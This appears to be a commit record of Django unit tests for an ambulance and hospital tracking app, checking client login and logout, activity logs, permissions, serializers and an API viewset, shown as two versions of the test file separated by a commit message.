self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 7)
# login hospital a1
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 9)
# logout ambulance
client1.hospital = None
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 11)
# login ambulance a2
client1.hospital = self.h2
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h2)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h2.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 13)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h2.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 15)
def testPermissions(self):
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
def testClientSerializer(self):
# test ClientSerializer
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name, ambulance=self.a1)
serializer = ClientSerializer(client1)
result = {
'id': client1.id,
'client_id': client1.client_id,
'user': client1.user.id,
'status': client1.status,
'ambulance': client1.ambulance.id,
'hospital': None,
'updated_on': date2iso(client1.updated_on)
}
self.assertDictEqual(serializer.data, result)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_3',
'status': ClientStatus.O.name,
'ambulance': None,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u2)
client2 = Client.objects.get(client_id='client_id_3')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u2)
self.assertEqual(client2.ambulance, None)
self.assertEqual(client2.hospital, None)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'status': ClientStatus.O.name,
'ambulance': self.a2.id,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, None)
# update client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'hospital': self.h1.id
}, partial=True)
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, self.h1)
def test_client_viewset(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
# instantiate client
client = DjangoClient()
# login as admin
client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])
# retrieve
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(client1).data
self.assertDictEqual(result, answer)
# set status and ambulance
status = ClientStatus.F.name
response = client.patch('/en/api/client/{}/'.format(str(client1.client_id)),
content_type='application/json',
data=json.dumps({
'status': status,
'ambulance': self.a1.id
}),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(Client.objects.get(id=client1.id)).data
self.assertDictEqual(result, answer)
# retrieve new status
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
self.assertEqual(result['status'], status)
self.assertEqual(result['ambulance'], self.a1.id)
# # set status location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a1.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a1.id)))
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set wrong attribute
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': 'will fail'
# }),
# follow=True)
# self.assertEqual(response.status_code, 400)
#
# # set wrong ambulance id
# response = client.patch('/en/api/ambulance/100/',
# data=json.dumps({
# 'status': status
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser2
# client.login(username='testuser2', password='very_secret')
#
# # retrieve ambulance
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(self.a3).data
# self.assertDictEqual(result, answer)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance status
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
#
# # set location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a3.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
#
# # login as testuser1
# client.login(username='testuser1', password='top_secret')
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a2.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # set status ambulance
# status = AmbulanceStatus.OS.name
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a3.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': status,
# }),
# follow=True)
# self.assertEqual(response.status_code, 404)
#
# # logout
# client.logout()
Removing location_client from ambulance.
import json
import logging
from io import BytesIO
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.db import transaction
from django.utils import timezone
from rest_framework.parsers import JSONParser
from django.test import Client as DjangoClient
from ambulance.models import Ambulance
from emstrack.tests.util import date2iso
from hospital.models import Hospital
from login.models import Client, ClientStatus, ClientLog, ClientActivity
from login.serializers import ClientSerializer
from login.tests.setup_data import TestSetup
logger = logging.getLogger(__name__)
class TestClient(TestSetup):
def testAmbulance(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 1)
# go offline
client1.status = ClientStatus.F.name
client1.save()
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 2)
# go online with ambulance
client1.status = ClientStatus.O.name
client1.ambulance = self.a1
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a1)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 4)
# go offline
client1.status = ClientStatus.F.name
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a1.identifier)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 6)
# client online
client1.status = ClientStatus.O.name
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 7)
# login ambulance a1
client1.ambulance = self.a1
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a1)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 9)
# logout ambulance
client1.ambulance = None
client1.save()
a = Ambulance.objects.get(id=self.a1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a1.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 11)
# login ambulance a2
client1.ambulance = self.a2
client1.save()
a = Ambulance.objects.get(id=self.a2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, self.a2)
self.assertEqual(a.client, client1)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.AI.name)
self.assertEqual(log.details, self.a2.identifier)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 13)
# go offline
client1.status = ClientStatus.F.name
client1.save()
a = Ambulance.objects.get(id=self.a2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(a, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.AO.name)
self.assertEqual(log.details, self.a2.identifier)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 15)
def testHospital(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 1)
# go offline
client1.status = ClientStatus.F.name
client1.save()
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 2)
# go online with hospital
client1.status = ClientStatus.O.name
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 4)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 6)
# client online
client1.status = ClientStatus.O.name
client1.save()
h = Ambulance.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 7)
# login hospital a1
client1.hospital = self.h1
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h1)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 9)
# logout ambulance
client1.hospital = None
client1.save()
h = Hospital.objects.get(id=self.h1.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h1.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 11)
# login ambulance a2
client1.hospital = self.h2
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.O.name)
self.assertEqual(client1.hospital, self.h2)
self.assertEqual(h.client, client1)
self.assertEqual(client1.ambulance, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HI.name)
self.assertEqual(log.details, self.h2.name)
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.O.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 13)
# go offline
client1.status = ClientStatus.F.name
client1.save()
h = Hospital.objects.get(id=self.h2.id)
client1 = Client.objects.get(id=client1.id)
self.assertEqual(client1.status, ClientStatus.F.name)
self.assertEqual(client1.ambulance, None)
self.assertFalse(hasattr(h, 'client'))
self.assertEqual(client1.hospital, None)
log = ClientLog.objects.filter(client=client1).latest('updated_on')
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HS.name)
self.assertEqual(log.details, '')
log = ClientLog.objects.filter(client=client1).order_by('-updated_on')[1]
self.assertEqual(log.client, client1)
self.assertEqual(log.status, ClientStatus.F.name)
self.assertEqual(log.activity, ClientActivity.HO.name)
self.assertEqual(log.details, self.h2.name)
self.assertEqual(len(ClientLog.objects.filter(client=client1)), 15)
def testPermissions(self):
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u2,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, hospital=self.h1)
with self.assertRaises(PermissionDenied):
with transaction.atomic():
Client.objects.create(client_id='client_id_1', user=self.u3,
status=ClientStatus.O.name, ambulance=self.a1, hospital=self.h1)
def testClientSerializer(self):
# test ClientSerializer
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name, ambulance=self.a1)
serializer = ClientSerializer(client1)
result = {
'id': client1.id,
'client_id': client1.client_id,
'user': client1.user.id,
'status': client1.status,
'ambulance': client1.ambulance.id,
'hospital': None,
'updated_on': date2iso(client1.updated_on)
}
self.assertDictEqual(serializer.data, result)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_3',
'status': ClientStatus.O.name,
'ambulance': None,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u2)
client2 = Client.objects.get(client_id='client_id_3')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u2)
self.assertEqual(client2.ambulance, None)
self.assertEqual(client2.hospital, None)
# create client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'status': ClientStatus.O.name,
'ambulance': self.a2.id,
'hospital': None
})
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, None)
# update client
serializer = ClientSerializer(data={
'client_id': 'client_id_4',
'hospital': self.h1.id
}, partial=True)
if not serializer.is_valid():
logger.debug('errors = {}'.format(serializer.errors))
self.assertTrue(False)
serializer.save(user=self.u1)
client2 = Client.objects.get(client_id='client_id_4')
self.assertEqual(client2.status, ClientStatus.O.name)
self.assertEqual(client2.user, self.u1)
self.assertEqual(client2.ambulance, self.a2)
self.assertEqual(client2.hospital, self.h1)
def test_client_viewset(self):
# client online
client1 = Client.objects.create(client_id='client_id_1', user=self.u1,
status=ClientStatus.O.name)
# instantiate client
client = DjangoClient()
# login as admin
client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])
# retrieve
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(client1).data
self.assertDictEqual(result, answer)
# set status and ambulance
status = ClientStatus.O.name
response = client.patch('/en/api/client/{}/'.format(str(client1.client_id)),
content_type='application/json',
data=json.dumps({
'status': status,
'ambulance': self.a1.id
}),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = ClientSerializer(Client.objects.get(id=client1.id)).data
self.assertDictEqual(result, answer)
# retrieve new status
response = client.get('/en/api/client/{}/'.format(str(client1.client_id)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
self.assertEqual(result['status'], status)
self.assertEqual(result['ambulance'], self.a1.id)
# # set status location
# timestamp = timezone.now()
# location = {'latitude': -2., 'longitude': 7.}
#
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'location': point2str(location),
# 'timestamp': date2iso(timestamp),
# }),
# follow=True)
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# answer = AmbulanceSerializer(Ambulance.objects.get(id=self.a1.id)).data
# if math.fabs(answer['orientation'] - result['orientation']) < 1e-4:
# answer['orientation'] = result['orientation']
# self.assertDictEqual(result, answer)
#
# # retrieve new ambulance location
# response = client.get('/en/api/ambulance/{}/'.format(str(self.a1.id)))
# self.assertEqual(response.status_code, 200)
# result = JSONParser().parse(BytesIO(response.content))
# self.assertEqual(result['status'], status)
# self.assertEqual(result['location'], point2str(location))
# self.assertEqual(result['timestamp'], date2iso(timestamp))
#
# # set wrong attribute
# response = client.patch('/en/api/ambulance/{}/'.format(str(self.a1.id)),
# content_type='application/json',
# data=json.dumps({
# 'status': 'will fail'
# }),
# follow=True)
